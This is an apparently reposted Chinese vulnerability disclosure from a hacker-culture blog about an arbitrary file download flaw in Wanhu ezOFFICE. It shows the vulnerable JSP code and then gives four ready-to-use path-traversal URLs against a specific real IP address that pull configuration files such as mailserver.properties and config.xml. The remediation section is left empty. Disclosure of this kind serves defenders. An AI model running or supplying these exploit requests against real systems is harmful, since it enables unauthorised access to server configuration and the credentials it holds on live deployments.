记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

万户ezOFFICE无限制任意文件下载

2014-09-04 23:50

String filepath="";

HttpServletRequest HSR=(HttpServletRequest)pageContext.getRequest();

String path=request.getParameter("path");

filepath=HSR.getRealPath("/upload/")+"/"+path+"/";

String filename = request.getParameter("FileName");

String name = request.getParameter("name");

name=new String(name.getBytes("GBK"),"iso-8859-1");

java.io.File file = new java.io.File(filepath + filename);

if(file.exists()){

// 设置响应头和下载保存的文件名

response.setContentType("csv");

response.setHeader("Content-Disposition",

"attachment; filename=\"" + name + "\"");



// 打开指定文件的流信息

java.io.FileInputStream fileInputStream = new java.io.FileInputStream(filepath + filename);



// 写出流信息

int i;

while ((i=fileInputStream.read()) != -1) {

out.write(i);

}

fileInputStream.close();

out.close();

}else{

response.setContentType("text/html; charset=GBK");

%>

<html>

<head>

<title></title>

<meta http-equiv="Content-Type" content="text/html; charset=GBK">

<SCRIPT LANGUAGE="JavaScript">

<!--

alert("指定的文件不存在!");

history.back();







配置文件为例:

http://222.178.221.54:7001/defaultroot/public/jsp/download.jsp?FileName=mailserver.properties&name=2.jsp&path=/../../config/



http://222.178.221.54:7001/defaultroot/public/jsp/download.jsp?FileName=govexchange.properties&name=2.jsp&path=/../../config/



http://222.178.221.54:7001/defaultroot/public/jsp/download.jsp?FileName=config.xml&name=2.jsp&path=/../../config/



http://222.178.221.54:7001/defaultroot/public/jsp/download.jsp?FileName=systemMark.properties&name=2.jsp&path=/../../config/

漏洞证明:

config.xml

586FCE6E-A89E-4D32-AA85-9E7E69D400EE.png

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2014-063711

阅读:71159 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“万户ezOFFICE无限制任意文件下载”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云